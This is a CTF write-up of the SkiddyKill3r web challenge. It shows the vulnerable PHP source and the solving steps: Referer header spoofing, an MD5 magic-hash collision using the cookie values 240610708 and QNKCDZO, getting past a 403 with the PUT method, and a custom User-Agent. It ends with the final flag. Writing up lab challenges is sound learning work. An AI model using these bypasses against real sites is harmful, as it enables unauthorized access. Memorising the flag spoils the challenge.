Post

SkiddyKill3r

Posted
cybertalents
cybertalents
By Bonface Maina
4 min read

This writeup details the complete breakdown of the SkiddyKill3r web challenge, a rigorous test of reconnaissance and creative problem-solving. The path to the flag required chaining multiple exploits: from Referer header spoofing and leveraging a classic PHP MD5 hash collision vulnerability, all the way to bypassing a 403 Forbidden error using the PUT method to discover a secret User-Agent string hidden deep within the server’s configuration.

Challenge Description :

1

Creative Thinking will make getting the flag so much easier

We visit the site. thesite

When we search for a user like admin here is the output. search

The hint is we always read the source code for the page and in the source code we get this comments.

1
2
3
4
5

<!-- Your Hint Is admin  To Get Hint Maybe Your Name Or Mine -->
<!-- Momen Is A Good Name Too -->
<!-- Just Try To Brute Them (Manually)-->

Searching for Momen we get a success . momen

Now we can visit the page at : /hint.php hintphp

From the hint page we need to add a parameter to the request.

1
2

/hint.php?show=True
/hint.php?show=False

Using the parameter as true : true

We get a php source code .

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

<?php

// Our Site Have robots.txt Too

require_once("real_flag.php");

if(isset($_GET['show']) && $_GET['show']==='True')
    show_source(__FILE__);
else
    echo("Parameter is good even it was <b>True</b> or <b>False</b>");


if(isset($_SERVER['HTTP_REFERER']) && $_SERVER['HTTP_REFERER']==='http://cyberguy')
    echo($flag1);
else

    echo("<br>Nothing To <b>show</b> Here !<br>");


if (isset($_COOKIE['flag']) &&  isset($_COOKIE['flag1']))
    {
        if($_COOKIE['flag'] != $_COOKIE['flag1'])
        {
            if(md5($_COOKIE['flag'])==md5($_COOKIE['flag1']))
            {
               echo "$flag2";
             }
        }
    
     }

if (isset($_GET['flag']) && $_GET['flag'] == "HiNt" && isset($_COOKIE['flag']) && $_COOKIE['flag'] == "True"){
    echo $hint;
};


/*
To Get The Final Flag Try To Search About The Right User-Agent And File ;) 
Remember: - The Flag Not Always Exits In What We See
*/
echo "<br><br>";
echo "Your User Agent : - <pre><b>" . htmlspecilachars($_SERVER['HTTP_USER_AGENT']) . "</b></pre> I Think You Need It ;)"  . "\n\n";

?>

The first line is commented and tells us about the robots.txt file.

1
2
3
4
5
6
7
8

curl http://cdcamxwl32pue3e6m4m236nlbg301p6v4yk5xix3g-web.cybertalentslabs.com/robots.txt

User-agent: *
Disallow: /
Allow: /index.php
Allow: /flag.php
Allow: /flag1.jpg
Disallow: /robots.txt.php #-> Access Here To Get The Final Flag ;)

Lets visit the link pages. /index.php indexphp

We get page not found.

/flag.php flagphp

nothing here also 🤦 and am sure you don’t want to visit the /flag1.jpg.

Back to the source code review this part picks our interest.

1
2
3

if(isset($_SERVER['HTTP_REFERER']) && $_SERVER['HTTP_REFERER']==='http://cyberguy')
    echo($flag1);
else

This means that on out request we should include the http_referer header and pass http://cyberguy as its parameter.

1

Referer: http://cyberguy

Sending the request we get the first part of the flag. flagp1

flag1 = 0xL4ugh{H3r0_

For flag two we have to satisfy this conditions.

1
2
3
4
5
6
7
8
9
10
11

if (isset($_COOKIE['flag']) &&  isset($_COOKIE['flag1']))
    {
        if($_COOKIE['flag'] != $_COOKIE['flag1'])
        {
            if(md5($_COOKIE['flag'])==md5($_COOKIE['flag1']))
            {
               echo "$flag2";
             }
        }
    
     }

we have this .

1
2
3
4
5
6
7
8
9

- condition 1
Cookie: flag=
Cookie: flag1=

- condition 2
flag != flag1

- condition 3
md5(flag) == md5(flag1)

To satisfy this we use this payload for hash magic

1

Cookie: flag=240610708; flag1=QNKCDZO

flagp2

flag2

1

I5_

The next part gives us a hint but we need to satisfy a condition.

1
2
3

if (isset($_GET['flag']) && $_GET['flag'] == "HiNt" && isset($_COOKIE['flag']) && $_COOKIE['flag'] == "True"){
    echo $hint;
}

Conditions :

  • get flag parameter
  • set the parameter to HiNt
  • set the Cookie to flag=True

Here is how the request should look like.

1
2
3
4

GET /hint.php?flag=HiNt HTTP1.1
Host: 

Cookie: flag=True

Sending the request we get : req

The hint :

1

Your Hint Is :- Go To _/robots.txt_ You May Find Any Thing Help You

Since we had visited all the allowed pages in the robots.txt file, lets try the disallow page which was robot.txt.php. And the hint does tell :

1

Disallow: /robots.txt.php #-> Access Here To Get The Final Flag ;)

Visiting the site we get a 403 error, to bypass this :

  • i added the cookie that we used to get flag 2
  • and changed the http method to a PUT roboto

We get :

  • /user_check.php A new page that we couldn’t see in the other robots.txt file
  • User Agent :- G3t_My_Fl@g_N0w() this is crucial for we had some hints pointing to it.
  • `/real_flag.php page now allowed

With this we can craft a request to the /real_flag.php and the /user_check.php page and have the user agent set to G3t_My_Fl@g_N0w() finalflag

Final flag.

1

0xL4ugh{H3r0_I5_You0_F0r_N0w}
Challenges, CyberTalents
web php-hash-magic
This post is licensed under CC BY 4.0 by the author.